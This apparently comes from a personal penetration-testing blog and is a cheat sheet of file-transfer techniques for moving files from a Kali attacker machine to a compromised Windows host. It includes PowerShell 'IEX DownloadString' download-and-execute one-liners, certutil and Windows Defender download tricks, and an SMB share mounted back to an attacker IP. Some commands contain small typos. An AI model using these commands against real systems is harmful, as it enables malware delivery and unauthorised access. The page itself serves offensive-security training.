Wanted to provide a single place to go for all file upload/download techniques when attacking a Windows machine from Kali Linux. This will be updated as I come across new ones and/or the next time I need to use them.
Uploading and Hosting Files
Python Web Server
The following will start a webserver in the present working directory using Python2.python -m SimpleHTTP Server 80
The following will start a webserver in the present working directory using Python3.python3 -m http.server 80
Impacket SMB Server
You can download Impacket from Github.
We’ll need to perform a few steps to set this up, but it’s a great way to transfer files to/from a system. To begin, let’s create a directory called smb on our attacking system. Files in this directory will be available on the other end, and likewise, the other end will be able to place files into this directory. mkdir smbimpacket-smbserver <sharename> `<path>`
Then we can mount this file share in PowerShell from the other side. New-PSDrive -Name "<ShareName>" -PSProvider "FileSystem" -Root "\\<attackerIP>\<ShareName>
And change into the new drive.cd <ShareName>:
Additional Method With Authentication:
On our Kali machine, we’ll start our Impacket server while in the directory we wish to host. sudo impacket-smbserver <shareName> $(pwd) -smb2support -user <user> -p <password>
Then on the Windows machine, we’ll connect back to this SMB share, but we’ll need to specify the credentials mentioned in the above command. To do that, we’ll use the following commands:
$pass = ConvertTo-SecureString '<password>' -AsPlainText -Force$cred = New-Object System.Management.Automation.PSCredential('<user>', $pass)New-PSDrive -Name "<ShareName>" -PSProvider "FileSystem" -Root "\\<attackerIP>\<ShareName> -Credential $cred
Downloading Files
PowerShell
The following will download and store a remote file to disk.Invoke-WebRequest -Uri "http://attackerIP/file.exe" -OutFile "C:\path\to\file.exe"
The following will download and automatically execute the remote PowerShell script when ran from a command prompt.powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://attackerIP/file.ps1')“
An alternative to the above is to use Invoke-WebRequest in a different manner. powershell.exe "IEX (IWR http://attackerIP/file.ps1 -UseBasicParsing)"
CertUtil
The following will download and store a remote file to disk.certutil.exe -urlcache -f "http://attackerIP/file.exe" file.exe
Windows Defender
The following will download and store a remote file to disk.MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]
Transferring with SSH
To copy a file from B to A while logged into B:scp /path/to/file username@a:/path/to/destination
To copy a file from B to A while logged into A:scp username@b:/path/to/file /path/to/destination
Transferring via Base64 Encoding
From within a PowerShell session, you may want to encode the file into Base64 format so you can just copy it down to your destination machine and decode it on the other side. This is handy for transferring small files.
Within PowerShell, you can encode a file by running:
$file-contents = Get-Content "filename.txt" $file-encode = [System.Text.Encoding]::UTF8.GetBytes($file-contents) [System.Convert]::ToBase64String($file-encode)
Then, within Kali, you can decode it using the following: echo -n <base64String> | base64 -d > filename.txt
This should create the file for you to interact with.
Infinite Logins 